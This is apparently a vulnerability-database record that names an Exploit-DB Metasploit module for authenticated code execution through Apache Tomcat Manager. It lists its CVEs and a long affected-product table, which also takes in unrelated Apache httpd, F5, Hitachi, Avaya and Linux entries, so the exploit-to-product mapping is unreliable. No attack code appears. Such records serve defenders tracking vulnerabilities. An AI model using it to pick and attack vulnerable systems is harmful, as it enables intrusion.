Details of VAR-E-201012-1020

ID

VAR-E-201012-1020

CVE

cve_id:	CVE-2010-4094	Trust: 1.0
cve_id:	CVE-2010-0557	Trust: 1.0
cve_id:	CVE-2009-4189	Trust: 1.0
cve_id:	CVE-2009-4188	Trust: 1.0
cve_id:	CVE-2009-3843	Trust: 1.0
cve_id:	CVE-2009-3548	Trust: 1.0
cve_id:	CVE-2012-0053	Trust: 0.8
cve_id:	CVE-2011-3368	Trust: 0.3

sources: BID: 51706 // BID: 49957 // PACKETSTORM: 109284 // EXPLOIT-DB: 16317

EDB ID

16317

TITLE

Apache Tomcat Manager - Application Deployer (Authenticated) Code Execution (Metasploit) - Multiple remote Exploit

Trust: 1.0

sources: EXPLOIT-DB: 16317

DESCRIPTION

Apache Tomcat Manager - Application Deployer (Authenticated) Code Execution (Metasploit). CVE-2010-4094CVE-2010-0557CVE-2009-4189CVE-2009-4188CVE-2009-3843CVE-2009-3548CVE-60670CVE-60317CVE-60176 . remote exploit for Multiple platform

Trust: 1.0

sources: EXPLOIT-DB: 16317

AFFECTED PRODUCTS

vendor:	hitachi	model:	web server	scope:	eq	version:	02-03	Trust: 1.8
vendor:	hitachi	model:	web server 02-04-/a	scope:	-	version:	-	Trust: 1.5
vendor:	hitachi	model:	web server	scope:	eq	version:	02-02	Trust: 1.2
vendor:	hitachi	model:	web server	scope:	eq	version:	02-01	Trust: 1.2
vendor:	avaya	model:	voice portal	scope:	eq	version:	5.1	Trust: 1.2
vendor:	apache	model:	tomcat manager	scope:	-	version:	-	Trust: 1.0
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.2	Trust: 0.9
vendor:	hitachi	model:	web server 01-02-/c	scope:	-	version:	-	Trust: 0.9
vendor:	hitachi	model:	web server 01-02-/b	scope:	-	version:	-	Trust: 0.9
vendor:	hitachi	model:	web server 01-02-/a	scope:	-	version:	-	Trust: 0.9
vendor:	ubuntu	model:	linux lts sparc	scope:	eq	version:	8.04	Trust: 0.6
vendor:	ubuntu	model:	linux lts powerpc	scope:	eq	version:	8.04	Trust: 0.6
vendor:	ubuntu	model:	linux lts lpia	scope:	eq	version:	8.04	Trust: 0.6
vendor:	ubuntu	model:	linux lts i386	scope:	eq	version:	8.04	Trust: 0.6
vendor:	ubuntu	model:	linux lts amd64	scope:	eq	version:	8.04	Trust: 0.6
vendor:	ubuntu	model:	linux i386	scope:	eq	version:	11.10	Trust: 0.6
vendor:	ubuntu	model:	linux amd64	scope:	eq	version:	11.10	Trust: 0.6
vendor:	ubuntu	model:	linux powerpc	scope:	eq	version:	11.04	Trust: 0.6
vendor:	ubuntu	model:	linux i386	scope:	eq	version:	11.04	Trust: 0.6
vendor:	ubuntu	model:	linux arm	scope:	eq	version:	11.04	Trust: 0.6
vendor:	ubuntu	model:	linux amd64	scope:	eq	version:	11.04	Trust: 0.6
vendor:	ubuntu	model:	linux powerpc	scope:	eq	version:	10.10	Trust: 0.6
vendor:	ubuntu	model:	linux i386	scope:	eq	version:	10.10	Trust: 0.6
vendor:	ubuntu	model:	linux arm	scope:	eq	version:	10.10	Trust: 0.6
vendor:	ubuntu	model:	linux amd64	scope:	eq	version:	10.10	Trust: 0.6
vendor:	ubuntu	model:	linux sparc	scope:	eq	version:	10.04	Trust: 0.6
vendor:	ubuntu	model:	linux powerpc	scope:	eq	version:	10.04	Trust: 0.6
vendor:	ubuntu	model:	linux i386	scope:	eq	version:	10.04	Trust: 0.6
vendor:	ubuntu	model:	linux arm	scope:	eq	version:	10.04	Trust: 0.6
vendor:	ubuntu	model:	linux amd64	scope:	eq	version:	10.04	Trust: 0.6
vendor:	slackware	model:	linux x86 64 -current	scope:	-	version:	-	Trust: 0.6
vendor:	slackware	model:	linux x86 64	scope:	eq	version:	13.37	Trust: 0.6
vendor:	slackware	model:	linux	scope:	eq	version:	13.37	Trust: 0.6
vendor:	slackware	model:	linux x86 64	scope:	eq	version:	13.1	Trust: 0.6
vendor:	slackware	model:	linux	scope:	eq	version:	13.1	Trust: 0.6
vendor:	slackware	model:	linux x86 64	scope:	eq	version:	13.0	Trust: 0.6
vendor:	slackware	model:	linux	scope:	eq	version:	13.0	Trust: 0.6
vendor:	slackware	model:	linux	scope:	eq	version:	12.2	Trust: 0.6
vendor:	slackware	model:	linux	scope:	eq	version:	12.1	Trust: 0.6
vendor:	slackware	model:	linux	scope:	eq	version:	12.0	Trust: 0.6
vendor:	slackware	model:	linux -current	scope:	-	version:	-	Trust: 0.6
vendor:	redhat	model:	enterprise linux desktop workstation client	scope:	eq	version:	5	Trust: 0.6
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	6	Trust: 0.6
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	5	Trust: 0.6
vendor:	mandriva	model:	linux mandrake x86 64	scope:	eq	version:	2011	Trust: 0.6
vendor:	mandriva	model:	linux mandrake	scope:	eq	version:	2011	Trust: 0.6
vendor:	mandriva	model:	linux mandrake x86 64	scope:	eq	version:	2010.1	Trust: 0.6
vendor:	mandriva	model:	linux mandrake	scope:	eq	version:	2010.1	Trust: 0.6
vendor:	mandrakesoft	model:	enterprise server x86 64	scope:	eq	version:	5	Trust: 0.6
vendor:	mandrakesoft	model:	enterprise server	scope:	eq	version:	5	Trust: 0.6
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.3	Trust: 0.6
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.1	Trust: 0.6
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.0	Trust: 0.6
vendor:	hitachi	model:	web server linux	scope:	eq	version:	04-00	Trust: 0.6
vendor:	hitachi	model:	web server linux	scope:	eq	version:	03-00	Trust: 0.6
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	03-00	Trust: 0.6
vendor:	hitachi	model:	web server 02-04-/b	scope:	-	version:	-	Trust: 0.6
vendor:	hitachi	model:	web server	scope:	eq	version:	02-04	Trust: 0.6
vendor:	hitachi	model:	web server	scope:	eq	version:	01-02	Trust: 0.6
vendor:	gentoo	model:	linux	scope:	-	version:	-	Trust: 0.6
vendor:	fujitsu	model:	interstage studio standard-j edition	scope:	eq	version:	9.2	Trust: 0.6
vendor:	fujitsu	model:	interstage studio standard-j edition	scope:	eq	version:	9.1	Trust: 0.6
vendor:	fujitsu	model:	interstage studio standard-j edition	scope:	eq	version:	9.0	Trust: 0.6
vendor:	fujitsu	model:	interstage studio standard-j edition	scope:	eq	version:	8.0.1	Trust: 0.6
vendor:	fujitsu	model:	interstage studio standard-j edition b	scope:	eq	version:	9.1.0	Trust: 0.6
vendor:	fujitsu	model:	interstage studio enterprise edition	scope:	eq	version:	9.2	Trust: 0.6
vendor:	fujitsu	model:	interstage studio enterprise edition	scope:	eq	version:	9.1	Trust: 0.6
vendor:	fujitsu	model:	interstage studio enterprise edition	scope:	eq	version:	9.0	Trust: 0.6
vendor:	fujitsu	model:	interstage studio enterprise edition	scope:	eq	version:	8.0.1	Trust: 0.6
vendor:	fujitsu	model:	interstage studio enterprise edition b	scope:	eq	version:	9.1.0	Trust: 0.6
vendor:	fujitsu	model:	interstage job workload server	scope:	eq	version:	8.1	Trust: 0.6
vendor:	fujitsu	model:	interstage business application server enterprise	scope:	eq	version:	8.0.0	Trust: 0.6
vendor:	fujitsu	model:	interstage apworks modelers-j edition	scope:	eq	version:	7.0	Trust: 0.6
vendor:	fujitsu	model:	interstage apworks modelers-j edition 6.0a	scope:	-	version:	-	Trust: 0.6
vendor:	fujitsu	model:	interstage apworks modelers-j edition	scope:	eq	version:	6.0	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	9.2	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition a	scope:	eq	version:	9.0	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	9.0	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	8.0.2	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	8.0.1	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	7.0.1	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	7.0	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	6.0	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	5.0	Trust: 0.6
vendor:	debian	model:	linux sparc	scope:	eq	version:	6.0	Trust: 0.6
vendor:	debian	model:	linux s/390	scope:	eq	version:	6.0	Trust: 0.6
vendor:	debian	model:	linux powerpc	scope:	eq	version:	6.0	Trust: 0.6
vendor:	debian	model:	linux mips	scope:	eq	version:	6.0	Trust: 0.6
vendor:	debian	model:	linux ia-64	scope:	eq	version:	6.0	Trust: 0.6
vendor:	debian	model:	linux ia-32	scope:	eq	version:	6.0	Trust: 0.6
vendor:	debian	model:	linux arm	scope:	eq	version:	6.0	Trust: 0.6
vendor:	debian	model:	linux amd64	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	voice portal	scope:	eq	version:	5.1.2	Trust: 0.6
vendor:	avaya	model:	voice portal	scope:	eq	version:	5.1.1	Trust: 0.6
vendor:	avaya	model:	voice portal sp1	scope:	eq	version:	5.1	Trust: 0.6
vendor:	avaya	model:	voice portal sp2	scope:	eq	version:	5.0	Trust: 0.6
vendor:	avaya	model:	voice portal sp1	scope:	eq	version:	5.0	Trust: 0.6
vendor:	avaya	model:	voice portal	scope:	eq	version:	5.0	Trust: 0.6
vendor:	avaya	model:	ip office application server	scope:	eq	version:	8.0	Trust: 0.6
vendor:	avaya	model:	ip office application server	scope:	eq	version:	7.0	Trust: 0.6
vendor:	avaya	model:	ip office application server	scope:	eq	version:	6.1	Trust: 0.6
vendor:	avaya	model:	ip office application server	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	6.1.3	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	6.1.2	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	6.1.1	Trust: 0.6
vendor:	avaya	model:	aura session manager sp2	scope:	eq	version:	6.1	Trust: 0.6
vendor:	avaya	model:	aura session manager sp1	scope:	eq	version:	6.1	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	6.1	Trust: 0.6
vendor:	avaya	model:	aura session manager sp1	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	aura session manager sp2	scope:	eq	version:	5.2	Trust: 0.6
vendor:	avaya	model:	aura session manager sp1	scope:	eq	version:	5.2	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	5.2	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	1.1	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	1.0	Trust: 0.6
vendor:	avaya	model:	aura messaging	scope:	eq	version:	6.0.1	Trust: 0.6
vendor:	avaya	model:	aura messaging	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	aura experience portal	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	aura communication manager utility services	scope:	eq	version:	6.2	Trust: 0.6
vendor:	avaya	model:	aura communication manager utility services	scope:	eq	version:	6.1	Trust: 0.6
vendor:	avaya	model:	aura communication manager utility services	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	aura communication manager	scope:	eq	version:	6.0.1	Trust: 0.6
vendor:	avaya	model:	aura communication manager	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	5.2.1	Trust: 0.6
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	6.1.1	Trust: 0.6
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	6.1	Trust: 0.6
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	5.2.3	Trust: 0.6
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	5.2.2	Trust: 0.6
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	5.2	Trust: 0.6
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.7.3	Trust: 0.6
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.7.2	Trust: 0.6
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.7.1	Trust: 0.6
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.7	Trust: 0.6
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.6.8	Trust: 0.6
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7.4	Trust: 0.6
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7.3	Trust: 0.6
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7.2	Trust: 0.6
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7.1	Trust: 0.6
vendor:	avaya	model:	aura communication manager	scope:	eq	version:	4.0	Trust: 0.6
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2	Trust: 0.6
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3	Trust: 0.6
vendor:	apache	model:	protocol.c cookie	scope:	-	version:	-	Trust: 0.5
vendor:	xerox	model:	freeflow print server 73.c0.41	scope:	-	version:	-	Trust: 0.3
vendor:	xerox	model:	freeflow print server 73.b3.61	scope:	-	version:	-	Trust: 0.3
vendor:	suse	model:	linux enterprise server for vmware sp1	scope:	eq	version:	11	Trust: 0.3
vendor:	suse	model:	linux enterprise server sp1	scope:	eq	version:	11	Trust: 0.3
vendor:	suse	model:	linux enterprise server sp4	scope:	eq	version:	10	Trust: 0.3
vendor:	suse	model:	linux enterprise sdk sp1	scope:	eq	version:	11	Trust: 0.3
vendor:	suse	model:	linux enterprise sdk sp4	scope:	eq	version:	10	Trust: 0.3
vendor:	sophos	model:	web appliance	scope:	eq	version:	3.8.1	Trust: 0.3
vendor:	sophos	model:	web appliance	scope:	eq	version:	3.8.0	Trust: 0.3
vendor:	sophos	model:	web appliance	scope:	eq	version:	3.7.9	Trust: 0.3
vendor:	redhat	model:	jboss enterprise web server for rhel	scope:	eq	version:	61.0	Trust: 0.3
vendor:	redhat	model:	jboss enterprise web server for rhel server	scope:	eq	version:	51.0	Trust: 0.3
vendor:	redhat	model:	enterprise linux workstation	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux server	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux hpc node optional	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux hpc node	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux desktop optional	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux desktop	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux desktop client	scope:	eq	version:	5	Trust: 0.3
vendor:	redhat	model:	enterprise linux server	scope:	eq	version:	5	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	6.2	Trust: 0.3
vendor:	juniper	model:	nsmexpress	scope:	eq	version:	-	Trust: 0.3
vendor:	juniper	model:	nsm3000	scope:	eq	version:	-	Trust: 0.3
vendor:	juniper	model:	network and security manager software	scope:	eq	version:	2012.2-	Trust: 0.3
vendor:	juniper	model:	junos space	scope:	eq	version:	12.3	Trust: 0.3
vendor:	juniper	model:	junos space	scope:	eq	version:	12.2	Trust: 0.3
vendor:	juniper	model:	junos space	scope:	eq	version:	12.1	Trust: 0.3
vendor:	juniper	model:	junos space	scope:	eq	version:	11.3	Trust: 0.3
vendor:	juniper	model:	junos space	scope:	eq	version:	11.2	Trust: 0.3
vendor:	juniper	model:	junos space	scope:	eq	version:	11.1	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.3.20	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.3.1.0	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.3.0.5	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.3.0.0	Trust: 0.3
vendor:	hp	model:	xp provisioning manager	scope:	eq	version:	5.0.0-00	Trust: 0.3
vendor:	hp	model:	xp p9000 command view advanced edition	scope:	eq	version:	7.4.0-00	Trust: 0.3
vendor:	hp	model:	xp p9000 command view advanced edition	scope:	eq	version:	7.3.1-00	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	7.1	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	7.0	Trust: 0.3
vendor:	hp	model:	p9000 tiered storage manager	scope:	eq	version:	5.0.0-00	Trust: 0.3
vendor:	hp	model:	p9000 replication monitor	scope:	eq	version:	6.0.0-00	Trust: 0.3
vendor:	hp	model:	p9000 replication monitor	scope:	eq	version:	5.0.0-00	Trust: 0.3
vendor:	hp	model:	p9000 replication manager	scope:	eq	version:	6.0.0-00	Trust: 0.3
vendor:	hp	model:	onboard administrator	scope:	eq	version:	3.55	Trust: 0.3
vendor:	hp	model:	onboard administrator	scope:	eq	version:	3.50	Trust: 0.3
vendor:	hp	model:	hp-ux b.11.31	scope:	-	version:	-	Trust: 0.3
vendor:	hp	model:	hp-ux b.11.11	scope:	-	version:	-	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	04-10-03(x64)	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	04-10-01(x64)	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	03-00-060	Trust: 0.3
vendor:	hitachi	model:	web server security enhancement 02-04-/b	scope:	eq	version:	-	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	04-10-03	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	04-10-02	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	04-10-01	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	04-10	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	04-00-05	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	04-00-04	Trust: 0.3
vendor:	hitachi	model:	web server solaris	scope:	eq	version:	04-00-01	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	04-00	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	04-00	Trust: 0.3
vendor:	hitachi	model:	web server aix	scope:	eq	version:	04-00	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	03-10-10	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	03-10-09	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	03-10	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	03-10	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	03-00-05	Trust: 0.3
vendor:	hitachi	model:	web server	scope:	eq	version:	03-00-02	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	03-00-01	Trust: 0.3
vendor:	hitachi	model:	web server	scope:	eq	version:	03-00-01	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	03-00	Trust: 0.3
vendor:	hitachi	model:	web server solaris	scope:	eq	version:	03-00	Trust: 0.3
vendor:	hitachi	model:	web server aix	scope:	eq	version:	03-00	Trust: 0.3
vendor:	hitachi	model:	web server	scope:	eq	version:	02-05	Trust: 0.3
vendor:	hitachi	model:	web server 02-04-/c	scope:	-	version:	-	Trust: 0.3
vendor:	hitachi	model:	web server 02-04-/a (windows(ip	scope:	-	version:	-	Trust: 0.3
vendor:	hitachi	model:	web server )	scope:	eq	version:	02-04	Trust: 0.3
vendor:	hitachi	model:	web server )	scope:	eq	version:	02-03	Trust: 0.3
vendor:	hitachi	model:	web server 01-02-/d	scope:	-	version:	-	Trust: 0.3
vendor:	hitachi	model:	cosminexus developer no version	scope:	eq	version:	0	Trust: 0.3
vendor:	hitachi	model:	cosminexus application server no version	scope:	eq	version:	0	Trust: 0.3
vendor:	hitachi	model:	cosminexus	scope:	eq	version:	9.0	Trust: 0.3
vendor:	hitachi	model:	cosminexus	scope:	eq	version:	8.0	Trust: 0.3
vendor:	hitachi	model:	cosminexus	scope:	eq	version:	7.0	Trust: 0.3
vendor:	hitachi	model:	cosminexus	scope:	eq	version:	6.0	Trust: 0.3
vendor:	hitachi	model:	cosminexus	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage studio standard-j edition	scope:	eq	version:	10.0	Trust: 0.3
vendor:	fujitsu	model:	interstage studio enterprise edition	scope:	eq	version:	10.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	9.3.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	10.0	Trust: 0.3
vendor:	f5	model:	firepass	scope:	eq	version:	7.0	Trust: 0.3
vendor:	f5	model:	firepass	scope:	eq	version:	6.1	Trust: 0.3
vendor:	f5	model:	enterprise manager	scope:	eq	version:	2.3	Trust: 0.3
vendor:	f5	model:	enterprise manager	scope:	eq	version:	2.1	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	10.0	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	11.1.0	Trust: 0.3
vendor:	f5	model:	big-ip wom hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator	scope:	eq	version:	11.1	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator	scope:	eq	version:	10.0	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip psm	scope:	eq	version:	11.1	Trust: 0.3
vendor:	f5	model:	big-ip psm	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip psm	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip psm	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip psm	scope:	eq	version:	10.0	Trust: 0.3
vendor:	f5	model:	big-ip psm hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	10.0	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	11.1.0	Trust: 0.3
vendor:	f5	model:	big-ip ltm hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	11.1	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	10.0	Trust: 0.3
vendor:	f5	model:	big-ip link controller hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	10.0	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	11.1.0	Trust: 0.3
vendor:	f5	model:	big-ip gtm hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	11.1	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	10.1	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	11.0.00	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	10.2.40	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	10.0.00	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	11.1.0	Trust: 0.3
vendor:	f5	model:	big-ip asm hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	11.1.0	Trust: 0.3
vendor:	f5	model:	big-ip apm hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	10.1	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	11.1.0	Trust: 0.3
vendor:	f5	model:	big-ip analytics 11.0.0-hf2	scope:	-	version:	-	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	11.0.0	Trust: 0.3
vendor:	f5	model:	arx	scope:	eq	version:	6.4	Trust: 0.3
vendor:	f5	model:	arx	scope:	eq	version:	6.3	Trust: 0.3
vendor:	f5	model:	arx	scope:	eq	version:	6.2	Trust: 0.3
vendor:	f5	model:	arx	scope:	eq	version:	6.1.1	Trust: 0.3
vendor:	f5	model:	arx	scope:	eq	version:	6.1	Trust: 0.3
vendor:	f5	model:	arx	scope:	eq	version:	6.0	Trust: 0.3
vendor:	avaya	model:	aura messaging	scope:	eq	version:	6.1	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.7.5	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6.8	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.15	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.14	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.13	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.12	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.11	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.10	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.9	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.8	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.6	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.5	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.4	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.3	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.2	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.63	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.61	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.60	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.59	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.58	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.57	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.56	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.55	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.54	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.53	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.52	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.51	Trust: 0.3
